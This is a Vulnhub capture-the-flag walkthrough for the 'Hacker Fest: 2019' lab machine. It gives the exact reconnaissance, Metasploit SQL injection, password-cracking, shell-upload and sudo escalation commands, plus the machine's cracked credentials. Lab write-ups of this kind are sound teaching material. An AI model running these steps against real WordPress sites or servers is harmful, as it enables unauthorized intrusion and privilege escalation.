Hacker Fest: 2019 Vulnhub Walkthrough

Description

The machine was part of workshop for Hacker Fest 2019 at Prague. A path for us is written in the description section of the site. According to this path we can start to solve our machine. If you want to download Hacker Fest: 2019, you can click here.

Writeups

First, we turn on the vulnerable machine we downloaded. The opening image of our machine is as follows. We run our vulnerable machine in virtualbox.

After turning on our machine, we get the IP Address of the machine by typing netdiscover command on our terminal screen.

netdiscover
netdiscover

Once you know the IP address of the destination machine, we will perform an Nmap scan to find out which ports are open.

nmap -sV 192.168.1.3
nmap

Since port 80 is open so we can visit the website of our vulnerable machine.

Since the vulnerable machine site we visit is a wordpress, we will perform a use the wpscan tool. With our wpscan tool and we will scan the vulnerabilities found in WordPress.

wpscan --url http://192.168.1.3
wpscan wordpress

We run the Metasploit tool with the command. Then write the payload selection command. We are writing the command. In the Options section, we write the IP Address of the machine that is vulnerable to RHOSTS information. Finally exploit to start the process by writing.

msfconsole
use auxiliary/admin/http/wp_google_maps_sqli
set RHOSTS 192.168.1.3
exploit
metasploit msfconsole exploit

In the section selected in white in a top screen image, we received the login password. We will save this password in a .txt file and start the cracking process. When we get in command and our password starts breaking.

john the ripper password crack hash

Now that we have successfully obtained our login information. It is now necessary to log in, then have root privileges. To do this, use the msfconsole command again. The codes entered in the code block are given in order. Run from the shell.

msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
set RHOSTS 192.168.1.3
set USERNAME webmaster
set PASSWORD kittykat1
exploit
shell
metasploit msfconsole payload shell

We have logged in with the www-data user in the shell we run. Now our only goal is to become a root user and we will provide a connection to ssh. As a webmaster and we need to be rooted in our vulnerable machine.

After the sudo command and we enter the password that we used in the ssh connection. With our last command and we become root users.

ssh [email protected]
kittykat1
sudo -l
kittykat1
sudo bash
ssh connection sudo -l sudo bash

Since we are root users. we can read our flag.

Hacker Fest: 2019 flag.txt

Stay follow for the next weak machine solution.

Related Posts

Scroll to Top